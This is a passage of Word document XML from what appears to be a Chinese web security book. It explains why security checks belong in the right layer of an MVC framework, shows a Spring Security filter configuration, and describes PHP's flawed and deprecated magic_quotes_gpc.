        <w:t>MVC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>框架示意图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId72"/>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="0" w:footer="0" w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>从数据的流入来看，用户提交的数据先后流经了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>View </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>层、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Model </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>层，数据的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>流出则反过来。在设计安全方案时，要牢牢把握住数据这个关键因素。在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>MVC </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>框架中，通过切片、过滤器等方式，往往能对数据进行全局处理，这为设计安全方案提供了极大的便利。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="156"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>比如在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Spring Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t>中，通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>URL pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>实现的访问控制，需要由框架来处理所有用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-34"/>
        </w:rPr>
        <w:t>请求，在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Spring Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>获取了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>URL handler </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>基础上，才有可能将后续的安全检查落实。在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Security </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的配置中，第一步就是在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>web.xml </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>文件中增加一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，接管用户数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:7.866582pt;width:411.15pt;height:90pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4168;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;filter&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="187" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;filter-name&gt;springSecurityFilterChain&lt;/filter-name&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="187" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;filter-class&gt;org.springframework.web.filter.DelegatingFilterProxy&lt;/filter-class&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/filter&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="2"/>
                    <w:rPr>
                      <w:sz w:val="17"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="0"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;filter-mapping&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="187" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;filter-name&gt;springSecurityFilterChain&lt;/filter-name&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="187" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;url-pattern&gt;/*&lt;/url-pattern&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/filter-mapping&gt;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="46"/>
        <w:ind w:left="203" w:right="220" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>然而数据的处理是复杂的，数据经过不同的应用逻辑处理后，其内容可能会发生改变。比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>如数据经过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>toLowercase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>，会把大写变成小写；而一些编码解码，则可能会把 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>GBK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>变成 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Unicode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>码。这些处理都会改变数据的内容，因此在设计安全方案时，要考虑到数据可能的变化，认真斟酌安全检查插入的时机。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="156"/>
        <w:ind w:left="604" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>在本书第 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>章中曾经提到，一个优秀的安全方案，应该是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>在正确的地方，做正确的事情</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="123" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>举例来说，在“注入攻击”一章中，我们并没有使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>magic_quotes_gpc </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>作为一项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>对抗 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>注入的防御方案，这是因为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>magic_quotes_gpc </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>是有缺陷的，它并没有在正确的地方</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>解决问题。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>magic_quotes_gpc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>实际上是调用了一次 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>addslashes()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>，将一些特殊符号</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>（比如单引号） 进行转义，变成了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>’ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="203" w:right="214" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>对应到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>MVC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>架构里，它是在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>View </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>层做这件事情的，而 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>注入是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Model </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>层需要解决的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>问题，结果如何呢？黑客们找到了多种绕过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>magic_quotes_gpc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>的办法，比如使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>GBK </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>编码、使用无单引号的注入等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="155"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>官方在若干年后终于开始正视这个问题，于是在官方文档</w:t>
      </w:r>
      <w:hyperlink w:history="true" w:anchor="_bookmark12">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>的描述中不再推荐大家使用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="65"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>它：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="4192">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>468702</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>148392</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4593953" cy="698373"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="33" name="image26.png" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="34" name="image26.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4593953" cy="698373"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="17" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>官方声明取消 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Magic Quotes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:line style="position:absolute;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4216;mso-wrap-distance-left:0;mso-wrap-distance-right:0" from="14.16pt,15.626519pt" to="158.16pt,15.626519pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
            <v:stroke dashstyle="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:line>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_bookmark12" w:id="71"/>
      <w:bookmarkEnd w:id="71"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>1 </w:t>
      </w:r>
      <w:hyperlink r:id="rId77">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman"/>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>http://php.net/manual/en/security.magicquotes.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId74"/>
          <w:headerReference w:type="even" r:id="rId75"/>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
          <w:pgNumType w:start="281"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="153"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>所以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Model </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>层的事情搞到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>View </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>层去解决，效果只会适得其反。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="203" w:right="192" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>一般来说，我们需要先想清楚要解决什么问题，深入理解这些问题后，再在“正确”的地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>方对数据进行安全检查。一些主要的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>安全威胁，如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>注入、访问控制、认证、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>跳转等不涉及业务逻辑的安全问题，都可以集中放在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>MVC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>框架中解决。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="153"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>在框架中实施安全方案，比由程序员在业务中修复一个个具体的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，有着更多的优势。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
